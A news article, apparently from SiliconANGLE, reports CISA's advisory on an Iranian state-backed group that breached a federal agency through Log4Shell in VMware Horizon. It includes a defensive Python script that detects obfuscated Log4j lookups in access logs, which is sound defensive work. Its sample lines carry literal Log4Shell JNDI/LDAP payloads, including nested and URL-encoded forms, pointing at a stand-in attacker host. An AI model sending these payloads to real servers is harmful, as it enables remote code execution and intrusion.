The U.S. Cybersecurity and Infrastructure Security Agency today disclosed that an Iranian government-sponsored advanced persistent threat group compromised the network of a Federal Civilian Executive Branch organization.
The breach, which dates back to February, was first detected in mid-June, and CISA conducted an incident response engagement with the affected FCEB organization through mid-July.
The Iranian hackers gained access to the network by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server. Log4Shell, a remote code execution flaw in the open-source Apache Log4j logging library, was first disclosed in December last year. The Federal Trade Commission warned in January that it would take legal action against companies that failed to patch the vulnerability.
While one arm of government was threatening businesses, the people responsible for federal cybersecurity failed to practice what they preach, leaving an agency network exposed for months while they were asleep at the wheel. Ironically, the FTC is itself an FCEB agency.
Having gained access, the unnamed Iranian hacking group installed the XMRig crypto-mining software, moved laterally to the domain controller, compromised credentials and then installed reverse proxies on several hosts to maintain persistence.
CISA had previously warned on June 23 that malicious cyber actors were continuing to exploit Log4Shell in VMware Horizon systems, but it was not known at the time that the warning was prompted by the FCEB compromise. The warning came days after CISA would have discovered that the FCEB organization had been breached.
“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat-hunting activities,” the agency said in its latest alert today. “If suspected initial access or compromise is detected based on indicators of compromise or tactics, techniques and procedures described in this Cybersecurity Advisory, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems and audit privileged accounts.”
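The threat-hunting advice above starts with the initial-access step: finding Log4Shell exploitation attempts against Horizon in request logs. A naive search for the string `${jndi:` misses the obfuscated payloads attackers actually send, because Log4j resolves nested lookups such as `${lower:j}` and `${::-j}` before the `jndi:` prefix appears. The following added example (written for this page, not code from CISA, VMware or the advisory) collapses those nesting tricks the way Log4j's string substitution does, URL-decodes the line, and only then matches. The access-log lines, IP addresses and the set of lookup forms handled are constructed for illustration and are not exhaustive.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup: one whose body contains no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")

# What an exploitation attempt looks like once the obfuscation is gone.
# The scheme is deliberately not checked: ldap, ldaps, rmi and dns have
# all been seen, and any jndi: lookup in a request is hostile.
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def _resolve(match):
    """Collapse one innermost lookup the way Log4j 2.x would for the
    evasion forms commonly seen in the wild (assumed list, not exhaustive).
    jndi lookups are returned untouched so the final match can see them."""
    expr = match.group(1)
    name, _, rest = expr.partition(":")
    key = name.strip().lower()
    if key == "jndi":
        return match.group(0)
    if key == "lower":          # ${lower:J} -> j
        return rest.lower()
    if key == "upper":          # ${upper:n} -> N
        return rest.upper()
    # ${env:NOPE:-j}, ${sys:NOPE:-j}, ${::-j}: an unset variable falls back
    # to the text after ":-", which is how attackers spell single letters.
    _, dsep, default = rest.partition(":-")
    return default if dsep else ""


def normalize(line: str) -> str:
    """URL-decode and resolve nested lookups until the line stops changing.
    The iteration cap bounds the work on adversarial input."""
    text = line
    for _ in range(20):
        new = _INNER.sub(_resolve, unquote(text))
        if new == text:
            break
        text = new
    return text


def is_log4shell_attempt(line: str) -> bool:
    """True if the line carries a jndi: lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def hunt(lines):
    """Return (1-based line number, de-obfuscated payload) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(0)))
    return hits


# Constructed Apache/Tomcat-style access log lines; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jun/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Jun/2022:03:14:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [15/Jun/2022:03:14:11 +0000] "GET /portal/?x=${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [15/Jun/2022:03:14:12 +0000] "POST /login HTTP/1.1" 200 88 "-" "%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fc%7D"',
    '10.0.0.9 - - [15/Jun/2022:03:15:00 +0000] "GET /static/app.js?v=${version} HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, payload in hunt(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

The last sample line shows why resolution matters in both directions: a harmless `${version}` placeholder collapses to nothing and is not flagged, while the nested and URL-encoded payloads on lines 3 and 4 resolve to the same `${jndi:ldap://...}` form as the plain one on line 2. Run this over Horizon's Tomcat access logs and the User-Agent and other header fields the Horizon components log, since the payload can arrive in any field Log4j writes; a hit on a server that was unpatched at the time is exactly the "assume compromise" trigger the advisory describes.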
Discussing the news, Brian Fox, chief technology officer of software supply chain security company Sonatype Inc., told SiliconANGLE that “our data shows that about 38% to 40% of all downloads of Log4j are still vulnerable to Log4Shell, so it’s not surprising that we continue to see APT groups use it as a part of their toolkit.”
Fox added that the advisory should serve as a warning to everyone in the industry, especially those in the federal government, not to lose sight of the need to keep finding straggling systems that may still run vulnerable versions. “That’s why software bill of materials and quality software composition analysis solutions are so important,” he said. “Developers and organizations need transparency into every element of their software supply chains for efficient fixes and to stay secure.”
Tom Kellermann, senior vice president of cyber strategy at application security software firm Contrast Security Inc., said the U.S. government is under siege by an axis of nation-states, all of which use exploits to bypass the perimeter defenses of agencies.
“The Iranian cyberspies exploited this open source vulnerability months after it was disclosed and subsequently burrowed into the agency network for four months before they were expelled,” Kellermann explained. “I am concerned that they might have used the agency network to island hop into other agency networks.”